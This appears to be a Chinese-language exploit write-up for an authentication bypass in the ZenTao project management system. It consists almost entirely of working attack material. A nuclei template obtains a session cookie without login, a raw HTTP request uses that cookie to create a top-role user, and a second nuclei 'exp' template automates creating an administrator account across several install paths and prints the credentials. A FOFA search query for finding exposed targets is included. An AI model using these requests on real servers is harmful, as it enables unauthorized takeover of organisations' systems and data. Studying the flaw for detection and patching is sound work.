## 禅道项目管理系统身份认证绕过漏洞 禅道项目管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后就可以实现完全接管服务器。 ## 影响版本 ``` 16.x <= 禅道项目管理系统< 18.12(开源版) 6.x <= 禅道项目管理系统< 8.12(企业版) 3.x <= 禅道项目管理系统< 4.12(旗舰版) ``` ## poc ``` id: easycorp-zentao-pms-idor info: name: 禅道项目管理系统身份认证绕过漏洞 author: GuoRong_X severity: critical description: | - 禅道系统某些API设计为通过特定的鉴权函数进行验证,但在实际实现中,这个鉴权函数在鉴权失败后并不中断请求,而是仅返回一个错误标志,这个返回值在后续没有被适当处理。此外,该系统在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。 reference: - https://mp.weixin.qq.com/s/hiGI_fQmXOHdkPqn6x00Jw metadata: verified: true fofa-query: title="用户登录- 禅道" tags: zentao http: - method: GET path: - "{{BaseURL}}/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu" matchers-condition: and matchers: - type: word part: header words: - 'Set-Cookie: zentaosid=' - type: status status: - 200 # digest: 4a0a0047304502200b7a7cb58af457a9e566160cfdc539a99325db1513d5e4172a9a0a66f2f44e63022100fe0cc4ffd848c733eba3240bf102695253caa1420845a2b8aec5ca731e394759:58d4ffcb61df0489d6ab2fd018c17de6 ``` ## 添加用户poc ``` POST /biz/api.php/v1/users HTTP/1.1 Host: 192.168.0.102 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Cookie: zentaosid=d95c19a900256b7dc3c3f1866b1d121c {"account": "asda33", "password": "QQqq123456", "realname": "asda33", "role": "top", "group": "1"} ``` ![image](https://github.com/wy876/POC/assets/139549762/1c15070d-1563-4573-aff9-5da0da8c5848) ## nuclei ``` id: easycorp-zentao-pms-idor-exp info: name: 禅道项目管理系统身份认证绕过漏洞 author: GuoRong_X severity: critical description: | - 禅道系统某些API设计为通过特定的鉴权函数进行验证,但在实际实现中,这个鉴权函数在鉴权失败后并不中断请求,而是仅返回一个错误标志,这个返回值在后续没有被适当处理。此外,该系统在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。 reference: - https://mp.weixin.qq.com/s/hiGI_fQmXOHdkPqn6x00Jw metadata: verified: true fofa-query: title="用户登录- 禅道" tags: zentao variables: username: '{{rand_base(6)}}' password: '{{rand_base(12)}}' http: - raw: - | GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 Host: {{Hostname}} - | GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 Host: {{Hostname}} - | GET /biz/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 Host: {{Hostname}} - | GET /max/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 Host: {{Hostname}} - | POST /api.php/v1/users HTTP/1.1 Host: {{Hostname}} {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"} - | POST /zentao/api.php/v1/users HTTP/1.1 Host: {{Hostname}} {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"} - | POST /biz/api.php/v1/users HTTP/1.1 Host: {{Hostname}} {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"} - | POST /max/api.php/v1/users HTTP/1.1 Host: {{Hostname}} {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"} cookie-reuse: true matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_5, "{{username}}") || contains(body_6, "{{username}}") || contains(body_7, "{{username}}") || contains(body_8, "{{username}}")' condition: and extractors: - type: dsl dsl: - '"USER: "+ username' - '"PASS: "+ password' ```